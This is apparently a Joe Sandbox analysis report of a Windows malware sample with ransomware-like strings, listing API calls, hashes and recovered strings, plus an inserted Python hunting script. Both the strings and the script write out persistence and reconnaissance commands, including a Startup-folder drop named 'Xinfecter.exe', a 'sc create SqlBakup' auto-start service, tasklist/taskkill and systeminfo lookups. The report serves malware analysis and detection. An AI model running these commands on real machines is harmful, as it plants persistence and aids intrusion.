• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00B4C5D8,000000FF,?,00AD4970), ref: 00AD427B
• CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 00AD428F
• CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 00AD42A0
• SetLastError.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00B4C5D8,000000FF), ref: 00AD42C5
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AD42F4
• ___std_exception_copy.LIBVCRUNTIME ref: 00AD4342
Strings
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: AcquireContextCrypt$ErrorLast$Exception@8Throw___std_exception_copy
• String ID: CryptAcquireContext$Crypto++ RNG
• API String ID: 636621833-1159690233
• Opcode ID: f7d38b5b989acccad9495114ca5f62387aded5b35f7c25f695da44c093022b3a
• Instruction ID: c5a480956effeda64a92864b141046726d0c106175fad3d8f5488a7f4f2c0153
• Opcode Fuzzy Hash: f7d38b5b989acccad9495114ca5f62387aded5b35f7c25f695da44c093022b3a
• Instruction Fuzzy Hash: CE41A572A40309ABD710DF94CC41F9AB7FCEB08B10F50466AF901A7390EBB4A5048BA0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID:
• String ID: $1234567891234567$@$U12H6AN==$_Enc$_[ID-$nqpso5938fh71jfu
• API String ID: 0-226619287
• Opcode ID: e77f04989cfbb4dde95a36c9c28d8b17686b83193c518fbaf367cfa999196c5e
• Instruction ID: 7a06b557ef58a430042d09509ba74929af760525f39b16af06053145c6cba73a
• Opcode Fuzzy Hash: e77f04989cfbb4dde95a36c9c28d8b17686b83193c518fbaf367cfa999196c5e
• Instruction Fuzzy Hash: 8513C071E102188FDF28EB24CD95BDDB7B9AF45304F1082A9E049A7291EB749EC9CF51
APIs
• NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,AE695AF0), ref: 00A84565
• NetApiBufferFree.NETAPI32(00000000), ref: 00A84606
• NetApiBufferFree.NETAPI32(00000000), ref: 00A84622
Strings
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: BufferFree$EnumUser
• String ID: Default
• API String ID: 2592758740-753088835
• Opcode ID: c029beb19bb5e4dd4c25bbf15ba48d75562092adbd9d09fb270c4fbe4760a592
• Instruction ID: 8e7ffd9cc3e7752f3460650e7f8bf89e5d67ec3c89c209c5ded9ba0c40b4bdf1
• Opcode Fuzzy Hash: c029beb19bb5e4dd4c25bbf15ba48d75562092adbd9d09fb270c4fbe4760a592
• Instruction Fuzzy Hash: 76415371D0021A9BCB14DF98D995BEEB7F8EB4D710F14426ED911B3290DB75AD04CB90
APIs
• CryptGenRandom.ADVAPI32(00000000,?,00000000,00000001), ref: 00AD4980
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 00AD499F
  • Part of subcall function 00AD4390: GetLastError.KERNEL32(00000010,AE695AF0,7597FC30,?), ref: 00AD43E0
• __CxxThrowException@8.LIBVCRUNTIME ref: 00AD4A0A
  • Part of subcall function 00B17E0C: RaiseException.KERNEL32(?,?,00AE538C,?,?,Dflt,?,?,?,?,?,00AE538C,?,00B89978,?), ref: 00B17E6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
• String ID: CryptGenRandom
• API String ID: 1600773198-3616286655
• Opcode ID: 48f75666915118b2b774837974fd639e30ff67fe6bf7d7317720bf13194716e8
• Instruction ID: 4727d8335dd1491eccd82c2c202488340829490330a8a1d953108fed7593591f
• Opcode Fuzzy Hash: 48f75666915118b2b774837974fd639e30ff67fe6bf7d7317720bf13194716e8
• Instruction Fuzzy Hash: D831B575A00348AFDB14DF94D955BDEBBF8EF09714F4001AAE806AB381DF715A08CB60
                                                                                                        APIs
                                                                                                        • PathIsNetworkPathA.SHLWAPI(?,00B6AB14,?,?,?,AE695AF0), ref: 00A859A7
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00A859D7
                                                                                                        • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,AE695AF0), ref: 00A859F1
                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,AE695AF0), ref: 00A85A0C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Path$ByteCharDiskFreeMultiNetworkSpaceWide__alloca_probe_16
                                                                                                        • String ID:
                                                                                                        • API String ID: 592574438-0
                                                                                                        • Opcode ID: 2ead21b83b2dd93842f523fe07bb9f9b7446c28dd19d0a9fd27a6c07429249dc
                                                                                                        • Instruction ID: 7b65a19abca6300312a66dae2ff19c32d30e0610fbbb98120de232b2bc4bd0bc
                                                                                                        • Opcode Fuzzy Hash: 2ead21b83b2dd93842f523fe07bb9f9b7446c28dd19d0a9fd27a6c07429249dc
                                                                                                        • Instruction Fuzzy Hash: EF51E071E00609DFDB18EFA8C8C5AADF7B5FF45750F1442A9E801A7291EB31AD05CB50
                                                                                                        APIs
                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00A83733
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: NameUser
                                                                                                        • String ID: user$user
                                                                                                        • API String ID: 2645101109-2939825470
                                                                                                        • Opcode ID: 472aaa8096f1e4d246876bbe946d5fccea58aba579f95837b051d4db67a1a0bb
                                                                                                        • Instruction ID: 3ae8b8697f0d69c42d0ee0464d705244e61abb08d6108d6afbf25122d5e0be0d
                                                                                                        • Opcode Fuzzy Hash: 472aaa8096f1e4d246876bbe946d5fccea58aba579f95837b051d4db67a1a0bb
                                                                                                        • Instruction Fuzzy Hash: 23417B71A1112DABDF24EF64CD98BDDB7B5EB58300F2046D9E409A7290DB38AB84CF50
                                                                                                        APIs
                                                                                                        • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00AD487A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextCryptRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 829835001-0
                                                                                                        • Opcode ID: f0ee9ab6eec153329ef721081132f6d8808a6c778cd2797a28cd64c8c6362e90
                                                                                                        • Instruction ID: 319c4fcf6de28ad13ac59d8f7abd88e10a5d312083a98c6ba3cb034496e775c1
                                                                                                        • Opcode Fuzzy Hash: f0ee9ab6eec153329ef721081132f6d8808a6c778cd2797a28cd64c8c6362e90
                                                                                                        • Instruction Fuzzy Hash: D221B571A583509BD720DF58ED45B5AB7E8EB48B50F0402ABEC06A7390EF746900C795
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Crypt$ContextRandomRelease__onexit
                                                                                                        • String ID:
                                                                                                        • API String ID: 2784917694-0
                                                                                                        • Opcode ID: a92f706c92cd7e8c209f86678734ee0049fa0584c2bf551a0fcb7dff2dc1e8ea
                                                                                                        • Instruction ID: bf650b93a067ba0f05a97efcf78994b27c9c31968be0387ec8a6b17928924a4f
                                                                                                        • Opcode Fuzzy Hash: a92f706c92cd7e8c209f86678734ee0049fa0584c2bf551a0fcb7dff2dc1e8ea
                                                                                                        • Instruction Fuzzy Hash: B6F02772A44348ABD711DFC8ED12B5A77E4E708B10F0006BEE516977C0DB7555008641

                                                                                                        Control-flow Graph (function at 00A9C27C; the rendered graph is not reproduced here)

                                                                                                        • Legend: Executed / Not Executed basic blocks
                                                                                                        • API calls visible in the graph's basic blocks: SetErrorMode, SetConsoleTitleW, GetModuleFileNameW, CopyFileW (two call sites), Sleep (in a retry loop)
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00A9C3FF
                                                                                                        • SetConsoleTitleW.KERNEL32(asykat), ref: 00A9C40A
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000400,dcdcf,00000000), ref: 00A9C523
                                                                                                        • CopyFileW.KERNEL32(00000000,00000000,00000000,00B4945D,000000FF), ref: 00A9C5E3
                                                                                                        • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 00A9C65D
                                                                                                          • Part of subcall function 00A93DD0: GetCurrentThread.KERNEL32 ref: 00A93E13
                                                                                                          • Part of subcall function 00A93DD0: OpenThreadToken.ADVAPI32(00000000), ref: 00A93E1A
                                                                                                          • Part of subcall function 00A93DD0: GetLastError.KERNEL32 ref: 00A93E24
                                                                                                          • Part of subcall function 00A93DD0: GetCurrentProcess.KERNEL32(0000000A,?), ref: 00A93E3B
                                                                                                          • Part of subcall function 00A93DD0: OpenProcessToken.ADVAPI32(00000000), ref: 00A93E42
                                                                                                          • Part of subcall function 00A93DD0: DuplicateToken.ADVAPI32(?,00000002,?), ref: 00A93E59
                                                                                                          • Part of subcall function 00A93DD0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A93E84
                                                                                                          • Part of subcall function 00A93DD0: LocalAlloc.KERNEL32(00000040,00000014), ref: 00A93E96
                                                                                                          • Part of subcall function 00A93DD0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00A93EAA
                                                                                                          • Part of subcall function 00A93DD0: GetLengthSid.ADVAPI32(?), ref: 00A93EBB
                                                                                                          • Part of subcall function 00A93DD0: LocalAlloc.KERNEL32(00000040,00000010), ref: 00A93EC7
                                                                                                          • Part of subcall function 00A93DD0: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 00A93EDC
                                                                                                          • Part of subcall function 00A93DD0: AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 00A93EF4
                                                                                                          • Part of subcall function 00A93DD0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 00A93F0C
                                                                                                          • Part of subcall function 00A85D90: GlobalMemoryStatusEx.KERNEL32(AE695AF0), ref: 00A85DAF
                                                                                                          • Part of subcall function 00A84500: NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,AE695AF0), ref: 00A84565
                                                                                                          • Part of subcall function 00A84500: NetApiBufferFree.NETAPI32(00000000), ref: 00A84606
                                                                                                          • Part of subcall function 00A84500: NetApiBufferFree.NETAPI32(00000000), ref: 00A84622
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileInitializeToken$AllocBufferCopyCurrentDescriptorErrorFreeLocalOpenProcessSecurityThread$AccessAllocateAllowedConsoleDaclDuplicateEnumGlobalLastLengthMemoryModeModuleNameStatusTitleUser
                                                                                                        • String ID: /f$" start= auto$" start=auto$","$"cmd.exe","$$$$$.K0H$21L0I$:\Documents and Settings\$:\Users\$Dflt$Fast$Manual_Mini_Config$Mini_Config$Mini_Config$Version 5.$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$asykat$asykat$user$c:\R_cfg.ini$dcdcf$k2ba8v$r1d8la$sc create SqlBakup binPath= "$taskkill /PID $tasklist /v /fo csv | findstr /i "dcdcf"$ver
                                                                                                        • API String ID: 2029459818-3079872959
                                                                                                        • Opcode ID: 825c4186893e8430affd24fa43a9a2beafb36567976cde47bc714844cdd5ea25
                                                                                                        • Instruction ID: 6ef4abc568082a10c17db28da798e8a860263a467ba08288f0bde582652dd984
                                                                                                        • Opcode Fuzzy Hash: 825c4186893e8430affd24fa43a9a2beafb36567976cde47bc714844cdd5ea25
                                                                                                        • Instruction Fuzzy Hash: 1E22B135910258DADB15FB64CE41BEEB7B4AF15340F0480E9E40AA72D2EF705B89CF62
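The function entry above (and the one that follows it) exposes the sample's persistence and reconnaissance command lines as plain strings: the Startup-folder copy `Xinfecter.exe`, `sc create SqlBakup binPath= "..." start= auto`, the self-lookup `tasklist /v /fo csv | findstr /i "dcdcf"`, `taskkill /PID`, the drop paths `\AppData\SysMain.sys` and `\AppData\S-inf.sys`, the config file `c:\R_cfg.ini`, and `systeminfo|find /i "os name"`. The script below is an added hunting example written for this report, not code from the sample or from Joe Sandbox: it turns those literals into matching rules and runs them over process-creation and file-creation events. The event records are constructed for the example (the `binPath=` target in the first record is a placeholder, since the report shows only the prefix of that command), and the event schema (`type`, `cmdline`, `path`) is an assumption, not a Joe Sandbox or Sysmon format.

```python
"""Hunting rules built from the string artefacts listed in the report.

The sample events at the bottom are constructed for this example; only the
IOC literals and command fragments come from the report's "String ID" lines.
"""
import re
from collections import Counter
from typing import Iterable

# File-system artefacts quoted in the report. Compared case-insensitively
# because the sample assembles some of these paths at runtime.
FILE_IOCS = (
    r"\Start Menu\Programs\Startup\Xinfecter.exe",
    r"\AppData\SysMain.sys",
    r"\AppData\S-inf.sys",
    r"c:\R_cfg.ini",
)

# Command-line fragments quoted in the report, as (rule name, regex).
# The service rule needs both 'sc create SqlBakup binPath=' and
# 'start= auto' / 'start=auto' (both spellings occur in the strings).
CMDLINE_RULES = (
    ("service_persistence_sqlbakup",
     re.compile(r"\bsc(\.exe)?\s+create\s+SqlBakup\s+binPath=.*start=\s*auto", re.I)),
    ("self_lookup_dcdcf",
     re.compile(r'tasklist\s+/v\s+/fo\s+csv.*findstr\s+/i\s+"dcdcf"', re.I)),
    ("kill_by_pid",
     re.compile(r"\btaskkill\s+/PID\s+\d+", re.I)),
    ("os_recon_systeminfo",
     re.compile(r'systeminfo\s*\|\s*find\s+/i\s+"(os name|original)"', re.I)),
)


def classify_event(event: dict) -> list:
    """Return the names of every rule the event matches (empty if none).

    event: {"type": "process", "cmdline": "..."} or
           {"type": "file", "path": "..."}  (assumed schema for this example)
    """
    hits = []
    if event.get("type") == "process":
        cmd = event.get("cmdline", "")
        hits.extend(name for name, rx in CMDLINE_RULES if rx.search(cmd))
    elif event.get("type") == "file":
        path = event.get("path", "").lower()
        hits.extend("file_ioc:" + ioc for ioc in FILE_IOCS if ioc.lower() in path)
    return hits


def summarize(events: Iterable[dict]) -> dict:
    """Count how many events matched each rule; rules with no hits are absent."""
    counts = Counter()
    for event in events:
        counts.update(classify_event(event))
    return dict(counts)


def triage(events: Iterable[dict]) -> bool:
    """True when at least two independent behaviours from the report are seen
    on one host, e.g. a Startup-folder drop plus the SqlBakup service.
    A single 'taskkill /PID' on its own is too common to act on."""
    summary = summarize(events)
    strong = {k for k in summary if k != "kill_by_pid"}
    return len(strong) >= 2


# Constructed sample telemetry (not from the sandbox run). The binPath value
# is a placeholder; the report only shows the command prefix.
SAMPLE_EVENTS = [
    {"type": "process", "cmdline": 'cmd.exe /c sc create SqlBakup binPath= "C:\\placeholder\\svc.exe" start= auto'},
    {"type": "process", "cmdline": 'cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"'},
    {"type": "process", "cmdline": "taskkill /PID 4120 /F"},
    {"type": "process", "cmdline": 'systeminfo|find /i "os name"'},
    {"type": "file", "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"},
    {"type": "file", "path": r"C:\Users\user\AppData\SysMain.sys"},
    {"type": "file", "path": r"C:\R_cfg.ini"},
    {"type": "process", "cmdline": r"notepad.exe C:\Users\user\notes.txt"},  # benign control
]

if __name__ == "__main__":
    for rule, n in sorted(summarize(SAMPLE_EVENTS).items()):
        print(f"{n:>3}  {rule}")
    print("escalate:", triage(SAMPLE_EVENTS))
```

The literals are deliberately kept as the report shows them rather than generalised: `SqlBakup`, `Xinfecter.exe` and `dcdcf` are specific enough to be low-noise in a fleet-wide search, while the `taskkill /PID` rule is downgraded in `triage` because legitimate administration produces the same command line.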
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A85920: PathIsNetworkPathA.SHLWAPI(?,00B6AB14,?,?,?,AE695AF0), ref: 00A859A7
                                                                                                          • Part of subcall function 00A85920: __alloca_probe_16.LIBCMT ref: 00A859D7
                                                                                                          • Part of subcall function 00A85920: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,AE695AF0), ref: 00A859F1
                                                                                                          • Part of subcall function 00A85920: GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,AE695AF0), ref: 00A85A0C
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D27
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D35
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D69
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A91D77
                                                                                                          • Part of subcall function 00A838C0: GetComputerNameExW.KERNEL32(00000000,?,?,AE695AF0,?), ref: 00A83941
                                                                                                          • Part of subcall function 00A838C0: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 00A839E0
                                                                                                          • Part of subcall function 00A7AE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7AE81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Path$ByteCharComputerDiskDomainFreeInformationIos_base_dtorMultiNameNetworkPrimaryRoleSpaceWide__alloca_probe_16std::ios_base::_
                                                                                                        • String ID: | $ ~$,d5$21L0I$21L0I$:\Users\$Microsoft$\AppData\S-inf.sys$_And_Netword_Drive_Size:$_Encryption_Mode:$_Fast_Mode$_Slow_Mode$___$api.ipify.org$user$echo %date%-%time%$f$hg3l,$n7t0$o8g9n$p2h6$s4e5y$systeminfo|find /i "original"$systeminfo|find /i "os name"$ver
                                                                                                        • API String ID: 586396178-3008485653
                                                                                                        • Opcode ID: 5efc4ce22b03321ef42b66f53720ce15147ca52d6a66d21c7a21c9d7c0ef60c6
                                                                                                        • Instruction ID: 5b99006b7eb98453adab242e3bd60e8ce0c7202c0398440b7b8cbf35cef1a280
                                                                                                        • Opcode Fuzzy Hash: 5efc4ce22b03321ef42b66f53720ce15147ca52d6a66d21c7a21c9d7c0ef60c6
                                                                                                        • Instruction Fuzzy Hash: AD13CC71E102589FEF28EB24CD45BEEBBB5AF51304F1081D8E0496B292DB755B88CF91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 6355 b378dd-b378e9 6356 b37903-b37907 6355->6356 6357 b378eb-b378fe call b259b3 call b25122 6355->6357 6356->6357 6359 b37909-b3790d 6356->6359 6371 b37af7-b37afa 6357->6371 6361 b37919-b3793e call b423d6 6359->6361 6362 b3790f-b37917 call b259a0 6359->6362 6369 b37940-b37955 call b34d66 * 2 6361->6369 6370 b37957-b3798f call b3769a 6361->6370 6362->6357 6384 b379b2-b379b4 6369->6384 6377 b37991-b379af call b34d66 * 3 6370->6377 6378 b379b9-b379c0 6370->6378 6377->6384 6379 b379c2-b379c4 6378->6379 6380 b379c5-b37a16 call b259a0 call b18980 CreateProcessA 6378->6380 6379->6380 6394 b37a18-b37a27 GetLastError call b2597d 6380->6394 6395 b37a3d-b37a43 6380->6395 6386 b37af5-b37af6 6384->6386 6386->6371 6408 b37a30-b37a32 6394->6408 6409 b37a29-b37a2a CloseHandle 6394->6409 6396 b37afb-b37b02 call b20f95 6395->6396 6397 b37a49-b37a4b 6395->6397 6399 b37a83-b37a86 6397->6399 6400 b37a4d-b37a6a WaitForSingleObject GetExitCodeProcess 6397->6400 6406 b37ac4-b37ac6 6399->6406 6407 b37a88-b37a8a 6399->6407 6404 b37a73-b37a75 6400->6404 6405 b37a6c-b37a6d CloseHandle 6400->6405 6410 b37a77-b37a78 CloseHandle 6404->6410 6411 b37a7e-b37a81 6404->6411 6405->6404 6412 b37ac8-b37ac9 CloseHandle 6406->6412 6413 b37acf-b37aef call b34d66 * 3 6406->6413 6414 b37a93-b37a95 6407->6414 6415 b37a8c-b37a8d CloseHandle 6407->6415 6416 b37aa0-b37ac2 call b34d66 * 3 6408->6416 6417 b37a34-b37a3b CloseHandle 6408->6417 6409->6408 6410->6411 6411->6416 6412->6413 6432 b37af1-b37af4 6413->6432 6419 b37a97-b37a98 CloseHandle 6414->6419 6420 b37a9e 6414->6420 6415->6414 6416->6432 6417->6416 6419->6420 6420->6416 6432->6386
                                                                                                        APIs
                                                                                                          • Part of subcall function 00B423D6: _free.LIBCMT ref: 00B423F8
                                                                                                        • _free.LIBCMT ref: 00B3794E
                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000), ref: 00B37A08
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00B37A18
                                                                                                        • __dosmaperr.LIBCMT ref: 00B37A1F
